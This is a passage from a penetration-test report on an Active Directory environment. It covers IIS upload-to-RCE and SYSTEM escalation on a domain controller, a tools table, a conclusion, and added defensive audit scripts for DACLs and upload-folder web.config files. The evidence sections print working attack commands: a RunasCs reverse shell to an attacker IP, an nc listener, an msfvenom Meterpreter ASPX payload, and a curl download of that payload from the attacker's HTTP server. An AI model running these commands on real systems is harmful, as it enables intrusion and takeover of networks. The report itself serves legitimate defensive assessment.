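def audit_dacl(sddl: str, object_dn: str) -> list:
    """List allow ACEs that hand takeover rights to a trustee outside the trusted set."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA") or is_trusted(ace["trustee"]):
            continue
        granted = [name for name in TAKEOVER if ace["rights"] & RIGHTS[name]]
        # WriteProperty with no object GUID means "write any attribute" (as good as GW);
        # scoped to a single attribute GUID it is usually legitimate delegation.
        if ace["rights"] & RIGHTS["WP"] and not ace["object_guid"]:
            granted.append("WP(all)")
        if granted:
            findings.append({"object": object_dn, "trustee": ace["trustee"],
                             "rights": granted, "inherits": "CI" in ace["flags"]})
    return findings


if __name__ == "__main__":
    for dn, sddl in (("OU=CityOps,DC=city,DC=local", CITYOPS_OU_SDDL),
                     ("CN=Web Admin,OU=Quarantine,DC=city,DC=local", WEB_ADMIN_USER_SDDL)):
        for f in audit_dacl(sddl, dn):
            print(f"{f['object']}: {f['trustee']} has {f['rights']} (inherits={f['inherits']})")
```

Run over every OU and every privileged user's SDDL, this reproduces the two edges BloodHound surfaced here (WriteDACL on the OU, GenericWrite on the user) as a scheduled audit rather than a one-off graph query.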

***

## F-11 – IIS File Upload Leading to Remote Code Execution

**Severity:** Critical\
**CVSS:** 9.8\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

### Description

Following the privilege escalation described in **F-09** and **F-10**, the attacker gained control of multiple domain accounts including `sam.brooks` and `web_admin`. The account `web_admin` was not a member of the *Remote Management Users* group and therefore could not directly authenticate through WinRM.

To execute commands as this account, the attacker first established a WinRM session using the compromised `sam.brooks` account and then executed commands under the `web_admin` context using the RunasCs utility. Because the IIS server allowed file uploads to the web root directory and executed ASP.NET files from that location, the attacker was able to upload a malicious ASPX payload which resulted in remote code execution on the server.

### Technical Evidence

A WinRM session was established using the compromised **sam.brooks** account:

```
evil-winrm -u sam.brooks -p [REDACTED] -i 10.1.1.109
```

The attacker uploaded the **RunasCs** tool:

```
upload RunasCs.exe
```

A reverse shell listener was started:

```
nc -lvnp 4444
```

Commands were executed as **web\_admin**:

```
RunasCs.exe web_admin '[REDACTED]' cmd.exe -r 10.200.38.62:4444
```

A malicious ASPX payload was generated:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=[REDACTED] LPORT=9005 \
-f aspx -o reverse.aspx
```

The payload was hosted on the attacker machine:

```
python -m http.server
```

The payload was downloaded to the web server:

```
curl -O http://[REDACTED]:8000/reverse.aspx
```

The file was placed in the IIS upload directory:

```
C:\inetpub\wwwroot\uploads
```

Triggering the payload through the browser:

```
http://10.1.1.109/uploads/reverse.aspx
```

This resulted in a Meterpreter session as `web_admin`:

```
[*] Meterpreter session 1 opened
```

### Impact

This vulnerability allows attackers to execute arbitrary code on the web server.

Successful exploitation enables attackers to:

* Execute system commands
* Deploy malware or persistence mechanisms
* Access sensitive application data
* Continue privilege escalation within the system

### Remediation

* Restrict executable file uploads on web servers
* Implement server-side file validation
* Disable execution permissions in upload directories
* Monitor web directories for unauthorized files
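An added example (not from the report) showing the weak and hardened `web.config` for the `C:\inetpub\wwwroot\uploads` directory side by side, with a small audit that reports whether the handler access policy or request filtering still lets a dropped `.aspx` execute there. Both configurations are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed web.config for C:\inetpub\wwwroot\uploads. This is what an upload folder
# looks like when it inherits the site-wide "Read, Script" handler policy: a .aspx
# written here is handed to the ASP.NET handler and runs as the application pool.
WEAK_WEB_CONFIG = """<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script" />
  </system.webServer>
</configuration>"""

# Hardened version for the same folder: handlers may only Read (no Script/Execute), so
# server-side files are served as static content, and request filtering refuses the
# script extensions outright so they cannot even be fetched.
HARDENED_WEB_CONFIG = """<configuration>
  <system.webServer>
    <handlers accessPolicy="Read" />
    <security>
      <requestFiltering>
        <fileExtensions>
          <add fileExtension=".aspx" allowed="false" />
          <add fileExtension=".asp" allowed="false" />
          <add fileExtension=".ashx" allowed="false" />
          <add fileExtension=".asmx" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""

DEFAULT_ACCESS_POLICY = "Read, Script"     # what IIS applies when the attribute is absent
EXECUTION_FLAGS = {"script", "execute"}
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")


def handler_access_policy(config_xml: str) -> set:
    """accessPolicy flags on system.webServer/handlers, lower-cased; default if missing."""
    root = ET.fromstring(config_xml)
    handlers = root.find("./system.webServer/handlers")
    if handlers is None:
        policy = DEFAULT_ACCESS_POLICY
    else:
        policy = handlers.get("accessPolicy", DEFAULT_ACCESS_POLICY)
    return {p.strip().lower() for p in policy.split(",") if p.strip()}


def blocked_extensions(config_xml: str) -> set:
    """Extensions denied by requestFiltering/fileExtensions in this config."""
    root = ET.fromstring(config_xml)
    path = "./system.webServer/security/requestFiltering/fileExtensions/add"
    return {e.get("fileExtension", "").lower() for e in root.iterfind(path)
            if e.get("allowed", "true").lower() == "false"}


def audit_upload_dir_config(config_xml: str) -> list:
    """Return the reasons an upload directory's web.config still permits script execution."""
    issues = []
    execution = handler_access_policy(config_xml) & EXECUTION_FLAGS
    if execution:
        issues.append("handlers accessPolicy grants " + ", ".join(sorted(execution))
                      + ": server-side scripts dropped here will execute")
    blocked = blocked_extensions(config_xml)
    for ext in SCRIPT_EXTENSIONS:
        if ext not in blocked:
            issues.append(f"requestFiltering does not deny {ext}")
    return issues


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(name, audit_upload_dir_config(cfg) or ["no issues"])
```

The same two controls can be applied from the site's root `web.config` with a `<location path="uploads">` element, which keeps them in place even if the folder's own file is deleted or overwritten by an upload.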

***

## F-12 – Privilege Escalation to NT AUTHORITY\SYSTEM via Named Pipe Impersonation

**Severity:** Critical\
**CVSS:** 9.8\
**Vector:** AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

### Description

After achieving remote code execution on the Domain Controller through the IIS web server, the attacker established a **Meterpreter session** running under the `web_admin` account. Using the Metasploit post-exploitation module `getsystem`, the attacker successfully escalated privileges to `NT AUTHORITY\SYSTEM`.

The `getsystem` command attempts multiple local privilege escalation techniques automatically. During testing, the escalation succeeded using Technique 5 – Named Pipe Impersonation (PrintSpooler variant). This technique abuses Windows service impersonation behavior to obtain SYSTEM privileges.

Successful exploitation resulted in full administrative control of the Domain Controller.

### Technical Evidence

Within the Meterpreter session, the attacker executed:

```
meterpreter > getsystem
```

Result:

```
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
```

Privilege verification confirmed SYSTEM access:

```
hostname
```

Output:

```
DC-CC
```

User verification:

```
whoami
```

Output:

```
nt authority\system
```

This confirmed that the attacker had obtained full operating system privileges on the Domain Controller.

### Impact

Successful privilege escalation to SYSTEM allows an attacker to:

* Execute commands with full administrative privileges
* Access and modify all files on the system
* Manipulate security policies
* Extract domain credentials
* Maintain persistent access within the environment

Because the compromised system is the Domain Controller, this level of access effectively grants the attacker complete control over the Active Directory domain.

### Remediation

* Disable unnecessary services such as the Print Spooler on Domain Controllers
* Apply the latest Windows security updates
* Restrict privileges assigned to service accounts
* Deploy endpoint detection capable of identifying privilege escalation techniques
* Monitor for suspicious process spawning and named pipe activity

***

## Tools Used

The following tools were used during the engagement to perform reconnaissance, enumeration, exploitation, credential access, and post-exploitation activities within the assessment scope.

| Tool                 | Category                         | Purpose                                                                          |
| -------------------- | -------------------------------- | -------------------------------------------------------------------------------- |
| Nmap                 | Network Reconnaissance           | Identification of open ports, services, and system fingerprinting                |
| Wireshark            | Network Analysis                 | Capturing and analyzing network traffic to identify credential exposure          |
| BloodHound           | Active Directory Enumeration     | Mapping privilege relationships and identifying attack paths in Active Directory |
| BloodHound-python    | AD Data Collection               | Collecting Active Directory data for BloodHound analysis                         |
| Impacket             | Active Directory Attacks         | Kerberoasting, DPAPI extraction, and AD interaction                              |
| Responder            | Credential Harvesting            | Capturing NTLM authentication hashes from network traffic                        |
| ntlm\_theft          | Credential Harvesting            | Generating malicious files to trigger NTLM authentication attempts               |
| John the Ripper      | Password Cracking                | Offline cracking of Kerberos and NTLM password hashes                            |
| smbclient            | SMB Interaction                  | Downloading and uploading files to SMB shares                                    |
| NetExec (nxc)        | Network Enumeration              | Verifying credentials and enumerating SMB services                               |
| BloodyAD             | Active Directory Exploitation    | Manipulating AD permissions and modifying user attributes                        |
| Evil-WinRM           | Remote Access                    | Establishing remote PowerShell sessions via WinRM                                |
| RunasCs              | Privilege Abuse                  | Executing commands under another user context                                    |
| Metasploit Framework | Exploitation / Post-Exploitation | Establishing Meterpreter sessions and privilege escalation                       |
| msfvenom             | Payload Generation               | Creating malicious ASPX payloads                                                 |
| Netcat               | Network Utility                  | Reverse shell listener for remote connections                                    |
| Python HTTP Server   | File Hosting                     | Hosting payloads for download during exploitation                                |

***

## Conclusion

The assessment demonstrated that a chain of misconfigurations, beginning with cleartext LDAP credentials and a writable SMB share and ending with Active Directory ACL abuse and an executable upload directory on the IIS server, allowed an unauthenticated attacker on the internal network to obtain `NT AUTHORITY\SYSTEM` on the Domain Controller.

Because the Domain Controller authenticates every user and system in the City Council environment, this level of access represents complete compromise of the domain: an attacker with the same position could extract every domain credential, manipulate Active Directory permissions, persist indefinitely, or deploy ransomware across the network.

Addressing these issues through improved access controls (LDAPS and LDAP signing, least-privilege share and OU permissions, a regularly audited ACL model), stronger authentication and credential hygiene (long service-account passwords or gMSA, no passwords in scripts or shell history), and a hardened IIS configuration that never executes uploaded content will significantly improve the organization's security posture.

***

<p align="center">Copyright © 2026 Dragkob. All Rights Reserved.</p>

